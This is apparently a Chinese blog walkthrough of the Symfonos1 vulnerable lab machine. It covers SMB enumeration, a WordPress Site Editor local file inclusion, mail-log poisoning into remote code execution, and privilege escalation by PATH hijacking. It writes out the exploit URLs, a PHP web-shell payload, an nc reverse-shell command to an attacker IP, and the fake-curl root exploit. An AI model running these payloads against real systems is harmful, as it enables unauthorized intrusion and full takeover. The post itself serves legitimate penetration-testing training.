码迷,mamicode.com
首页 > 其他好文 > 详细

Symfonos1

时间:2020-04-09 16:50:20      阅读:107      评论:0      收藏:0      [点我收藏+]

标签:神话   etc   系统调用   加ip   class   监听   esc   技术   targe   

靶机下载地址:这里

靶机难度:初级

靶机发布日期:29 Jun 2019

 

启动靶机,用找到扫描局域网找到靶机IP

靶机IP为 192.168.133.151

技术图片

 进行端口扫描, 开放了22、25、80、139、445端口

 技术图片

扫描网站

技术图片

 访问一下网页80端口

技术图片

 没有比较明显的突破,但是服务器还开启了samba服务,看一下服务器分享的所有资源

技术图片

 可以看到有两个用户,一个是匿名用户anonymous,另一个是helios,登入匿名用户

技术图片

发现一个文件,把它下载下来,读取内容:”再使用‘epidioko‘, ‘qwerty‘ and ‘baseball‘这类的密码就被开除“

技术图片

推测用户helios的密码是这三个中的一个,尝试登入发现密码是 ”qwerty“ ,看一下这个用户的smb可以访问的资源

技术图片

有两个文件,依此下载读取,esearch.txt的内容是神话故事,todo.txt中的第三点/h3l105可能是一个目录

技术图片

于是访问一下这个目录,可以看到网站是由wordpress搭建的

技术图片

点击下面的链接,会跳转到symfonos.local/h3l105 ,需要用hosts让ip地址与主机名之间建立映射,在/etc/hosts里面添加ip和域名,才能正常解析

技术图片

 可以正常访问之后,就可以用wpscan枚举插件

wpscan --url http://symfonos.local/h3l105/ -eap

技术图片

 发现了两个插件,而且两个插件都有漏洞

searchsploit site editor 1.1.1
earchsploit mail masta 1.0

技术图片

 这里用site editor 1.1.1的LFI来测试一下,先把44340.txt下载下来

searchsploit -m 44340.txt

技术图片

 然后找到POC

技术图片

 尝试利用POC读取/etc/passwd,并且成功读取,说明漏洞可以利用

http://192.168.133.151/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

技术图片

前面扫描发现服务器还开放了25端口,25端口开放的是SMTP服务,尝试读取用户helios的邮件日志

http://192.168.133.151/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios

技术图片

成功读取用户日志,那么可以通过污染邮件日志,让LFI变成RCE

我们可以用telnet向helios发送植入一句话木马的邮件,再利用插件的本地文件包含漏洞让其可以远程命令执行

MAIL FROM: test
RCPT TO: helios
data
<?php system($_GET[‘shell‘]); ?>
.
QUIT

技术图片

测试一下RCE,并且成功执行

http://192.168.133.151/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&shell=id

技术图片

 那就可以利用这个RCE反弹一个shell,使用nc在kali上监听9999端口

nc-lvp 9999

技术图片

 然后访问这个链接,即执行nc -e /bin/bash 192.168.133.130 9999

192.168.133.151/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&shell=nc -e /bin/bash  192.168.133.130 9999

 成功反弹shell, 然后用python将shell转化成交互式tty

python -c "import pty;pty.spawn(‘/bin/bash‘)"

技术图片

 现在只是一个普通用户,需要进一步提权成root权限

用find找到启用SUID的二进制文件,看到一个通常不属于这里面的一个二进制文件

find / -perm -4000 -type f 2>/dev/null

 技术图片

用strings查看里面的信息,发现该程序调用curl

技术图片

那么我们可以建一个假的curl,追加/tmp到环境变量开头,这样系统调用curl的时候就可以执行假的curl,进而达到提权效果

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck

成功获得root权限

技术图片

 技术图片

 

总结:利用samba服务器获得信息和已知的wordpress插件漏洞让LFI变成RCE,最后利用Linux环境变量提权

 

参考链接如下

https://www.jianshu.com/p/ddcb97b8c069

https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

 

Symfonos1

标签:神话   etc   系统调用   加ip   class   监听   esc   技术   targe   

原文地址:https://www.cnblogs.com/gaonuoqi/p/12663014.html
(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
分享档案
更多>
2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)
周排行
mamicode.com排行更多图片
更多
友情链接
兰亭集智   国之画   百度统计   站长统计   阿里云   chrome插件   新版天听网
关于我们 - 联系我们 - 留言反馈
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!